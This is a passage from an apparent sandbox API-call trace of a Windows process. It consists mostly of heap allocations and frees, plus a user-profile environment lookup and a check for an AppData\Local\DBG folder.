hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0157.062] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0157.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0157.063] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0157.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0157.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0157.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0157.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0157.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0157.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0157.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0157.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0157.065] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0157.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0157.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0157.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.066] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0157.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0157.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0157.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0157.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0157.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0157.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.069] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/DBG", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d2da137, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBG", cAlternateFileName="")) returned 0x9e1cb8 [0157.070] FindClose (in: 